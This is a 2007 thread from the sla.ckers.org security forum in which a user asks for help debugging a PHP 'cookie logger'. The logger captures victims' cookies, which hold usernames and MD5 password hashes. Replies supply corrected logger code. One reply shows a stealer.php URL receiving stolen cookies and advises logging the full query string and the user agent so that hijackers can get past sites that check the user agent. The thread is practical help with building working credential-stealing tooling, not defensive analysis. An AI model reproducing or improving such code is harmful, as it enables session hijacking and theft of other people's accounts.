Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Logging Cookies Weirdly..
Posted by: m0d3ration
Date: November 22, 2007 09:20AM

I have a site that sets cookies with the format user=username&password=md5encryptedpassword so I set up a cookie logger:
<?php
$cookie = $_REQUEST["cookie"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookie . "\n------------------------------\n");
?>
but for some reason, all that $cookie contains is up to user=username
the &password= doesn't show up. I have no idea why, can someone enlighten me as to why please and perhaps give me a workaround?

Options: ReplyQuote
Re: Logging Cookies Weirdly..
Posted by: Anonymous User
Date: November 22, 2007 08:02PM

Do you use escape() when setting the cookie?

Options: ReplyQuote
Re: Logging Cookies Weirdly..
Date: November 26, 2007 01:57PM

Wouldnt you access the values like so...?

<?php

$cookie = 'user=' . $_COOKIE['user'] . '&password=' . $_COOKIE['password']
        . "\n------------------------------\n";
$file = fopen('log.txt', 'a');
fwrite($file, $cookie);

?>

Options: ReplyQuote
Re: Logging Cookies Weirdly..
Posted by: digi7al64
Date: November 26, 2007 05:01PM

the problem is the cookie values are appended to the url

http://doh.com/stealer.php?cookie=user=username&password=md5encryptedpassword

hence

$_REQUEST["cookie"] equals 'user=username'


so of course it is going to pick up on anything else becuase you only asked for the cookie querystring value.

this is very common problem for the most cookie stealers - log the entire querystring not just a single value... oh a get the user agent also, some site use this to verify the user is who they say ther are

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote


Sorry, only registered users may post in this forum.